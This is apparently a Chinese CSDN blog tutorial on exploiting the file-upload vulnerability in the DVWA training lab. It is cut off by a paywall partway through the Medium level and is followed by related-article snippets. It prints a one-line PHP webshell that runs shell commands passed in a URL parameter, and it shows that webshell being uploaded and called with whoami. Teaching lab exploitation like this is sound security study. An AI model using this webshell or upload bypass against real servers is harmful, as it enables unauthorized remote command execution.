DVWA之PHP文件上传漏洞(File Upload)

最新推荐文章于 2024-04-07 20:16:29 发布
VIP文章 最新推荐文章于 2024-04-07 20:16:29 发布
阅读量1.7w 收藏 22
点赞数 3
分类专栏: DVWA 漏洞 Web安全 渗透 文章标签: DVWA 安全 PHP文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ski_12/article/details/54669614
版权

文件上传漏洞是指由于服务器对于用户上传部分的控制不严格导致攻击者可以上传一个恶意的可执行的文件到服务器。简单点说,就是用户直接或者通过各种绕过方式将webshell上传到服务器中进而执行利用。

首先保存一句话木马为1.php文件:

<?php echo shell_exec($_GET['cmd']);?>

另外对于上传的文件,可在DVWA的服务器中(本人用的是Metasploitable虚拟机)以下路径找到: 

/var/www/dvwa/hackable/uploads/


Low级:

先看看源代码:

 <?php
    if (isset($_POST['Upload'])) {

            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename( $_FILES['uploaded']['name']);

            if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                
                echo '<pre>';
                echo 'Your image was not uploaded.';
                echo '</pre>';
                
              } else {
            
                echo '<pre>';
                echo $target_path . ' succesfully uploaded!';
                echo '</pre>';
                
            }

        }
?>


DVWA_WEB_PAGE_TO_ROOT为网页的根目录,target_path变量为上传文件的绝对路径,basename( $_FILES['uploaded']['name'])将文件中已经“uploaded”的文件的名字取出并加入到target_path变量中。if语句判断文件是否上传到指定的路径中,若没有则显示没有上传。总的可见,此级别没有对上传文件的类型进行任何的过滤,也就是可以随意上传php文件。

将1.php直接上传,然后通过显示的路径进行访问,在路径后要加上cmd参数的whoami命令:




Medium级:

先看源代码:

 <?php
    if (isset($_POST['Upload'])) {

            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename($_FILES['uploaded']['name']);
            $uploaded_name = $_FILES['uploaded']['name'];
            $uploaded_type = $_FILES['uploaded']['type'];
            $uploaded_size = $_FILES['uploaded']['size'];

            if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){


                if(!move_uploaded_file($_FILES['uploaded']['tmp_nam
最低0.47元/天 解锁文章
Mi1k7ea
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
PHP_file_upload_vlun:PHP文件上传漏洞
05-14
#PHP文件上传漏洞的源代码
PHP漏洞全解(九)-文件上传漏洞
weixin_34072637的博客
02-13 143
一套web应用程序,一般都会提供文件上传的功能,方便来访者上传一些文件。 下面是一个简单的文件上传表单 <form action="upload.php" method="post" enctype="multipart/form-data" name="form1"> <input type="file" name="file1" />&l...
DVWA——文件上传
最新发布
m0_74426634的博客
04-07 708
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
php 上传文件漏洞,【文件上传PHP文件上传漏洞
weixin_42309083的博客
03-09 569
0x01 文件上传漏洞文件上传漏洞顾名思义就是用户上传一个可执行的脚本文件,获得了执行服务器端命令的能力。通常,文件上传是getshell最常用、最直接的方式了。但是,文件上传本身是一个正常的业务需求,因此问题在于如何安全的上传。0x02 文件上传的触发条件上传的文件被Web容器解释执行用户能够从web页面访问到被上传的文件(直接或间接)用户上传的文件通常不能被网站程序压缩、修改内容0x03 从防...
PHP文件上传漏洞
BrosyveryOK的博客
11-28 2101
上礼拜一直在搞期中测试和unctf,没啥时间整理,这礼拜继续整理!
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
文件上传upload-labs(一)
01-08
使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉,xampp安装的时候有很多工序,所以我选择的是phpstudy搭建了靶机环境,个人觉得学习文件上传dvwa好一点,这个用来训练和...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
PHPDVWA文件包
07-28
PHPDVWA文件包,内有phpstudy_x64_8.1.1.3及DVWA-master,DVWA解压可直接用。 DVWA页面登陆用户为root,密码为123456
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
PHP 代码审计 --------- 文件上传漏洞
qq_62344745的博客
04-19 503
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和“文件上传”本身是没有问题,有问题的是文件上传后,服有效的,务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
php文件上传漏洞waf,web安全文件上传漏洞
weixin_35784728的博客
03-18 219
一、文件过滤的方法文件头校验:JPEG ==>FF D8 FF E0、PNG==>89 50 4E 47 0D 0A 1A 0AORIGIN只允许本网站的嵌套,ALLOW-FROM允许指定地址的嵌套X-XSS-Protection:表示启用XSS过滤(禁用过滤为X-XSS-Protection:0),mode=block表示若文件类型校验:HTTP头中的content/type,互联网...
文件上传漏洞 php,你不知道的文件上传漏洞php代码分析
weixin_28871885的博客
03-11 186
漏洞描述开发中文件上传功能很常见,作为开发者,在完成功能的基础上我们一般也要做好安全防护。文件处理一般包含两项功能,用户上传和展示文件,如上传头像。文件上传攻击示例upload.php?upload.html?上述代码未经过任何验证,恶意用户可以上传php文件,代码如下恶意用户可以通过访问 如http://server/uploads/shell.php?command=phpinfo(); 来执...
php文件上传漏洞 抓包,浅谈文件解析及上传漏洞
weixin_29557457的博客
03-10 860
中国菜刀在web***中,我最期待两种漏洞,一种是任意命令执行漏洞,如struct2漏洞等;另一种是文件上传漏洞,因为这两种漏洞都是获取服务器权限最快最直接的方法。而对于任意命令执行漏洞,如果是通过内网映射出来的,那么可能还需要使用不同的手段进行***文件上传,从而获取webshell,通过webshell进行端口转发或者权限提升。本文主要是介绍文件上传中的个人利用技巧经验汇总,讲解分为两部分:一...
Web安全--文件上传漏洞--通用漏洞--PHP
weixin_68243135的博客
11-17 702
Web安全--文件上传--绕过--php
php 上传文件漏洞,php文件上传漏洞图片解析漏洞
weixin_42105816的博客
03-09 440
(1).先看靶机代码:(4).上传文件.htaccess 设置允许执行.jpg文件,因为服务器是apache允许这样设置。AddTypeapplication/x-httpd-php.jpg(5).中国菜刀连接成功
php文件上传漏洞防御,PHP漏洞全解(九)-文件上传漏洞
weixin_42486913的博客
03-27 699
一套web应用程序,一般都会提供文件上传的功能,方便来访者上传一些文件。下面是一个简单的文件上传表单php的配置文件php.ini,其中选项upload_max_filesize指定允许上传的文件大小,默认是2M$_FILES数组变量PHP使用变量$_FILES来上传文件,$_FILES是一个数组。如果上传test.txt,那么$_FILES数组的内容为:$FILESArray{[file] =&...
DVWA文件上传漏洞
05-02
DVWA中,文件上传漏洞可以通过以下步骤进行利用: 1. 登录DVWA,并进入上传页面。 2. 选择要上传的文件,并将其改名为具有执行权限的文件类型(如.php、.asp等)。 3. 点击上传按钮,并捕获上传请求的数据包。 4....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值